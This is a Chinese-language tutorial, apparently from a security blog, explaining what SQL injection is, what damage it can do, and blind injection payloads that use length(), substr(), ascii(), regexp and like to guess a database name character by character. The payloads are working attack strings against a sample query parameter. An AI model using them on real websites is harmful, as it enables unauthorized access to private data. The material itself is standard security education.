文章目录
SQL注入原理与利用
SQL注入是什么
- SQL Injection,一种将SQL语句插入或添加到用户的输入参数中的攻击,这些参数传递给后台的SQL数据库服务器加以解析并执行
SQL注入危害
- 绕过登录验证:使用万能密码登陆网站后台
- 获取敏感信息:获取网站管理员的账号密码等
- 文件系统操作:列目录、读取写入等
- 注册表操作:读取写入删除注册表等
- 执行系统命令:远程执行
SQL注入函数
length()
例:?name=lucy‘ and length((select database()))=7 --+(通过依次加一来获取数据库长度,也可以用>,二分法)
left()
例:?name=lucy‘ and left((select database()),2)=‘pi’ --+(获取数据库前两位,可以依次加一来获取数据库名称,也可以换查询语句查其他内容)
substr() & mid() & ord()
例:从第一位开始截取一位
- ?name=lucy‘ and substr((select database()),1,1)=‘p’ --+
- ?name=lucy‘ and mid((select database()),2,1)=‘p’ --+
- ?name=lucy‘ and ascii(substr((select database()),1,1))>100 --+
- ?name=lucy‘ and ascii(mid((select database()),2,1))=112 --+
- ?name=lucy‘ and ord(mid((select database()),2,1))=112 --+
if()
例:if(判断条件,为真返回值,为假返回值),默认参数为真用and,为假用or判断,多用于基于时间盲注,举例见后面时间盲注
regexp—正则表达式
例:通过改变字符范围来确定
- ?name=lucy‘ and (select database()) regexp ‘1’ --+
- ?name=lucy‘ and (select database()) regexp ‘^pi’ --+
like
例:%前面的字符匹配数据库名,显示正常则猜测正确
- ?name=lucy‘ and (select database()) like ‘p%’ --+
- ?name=lucy‘ and (select database()) like ‘pi%’ --+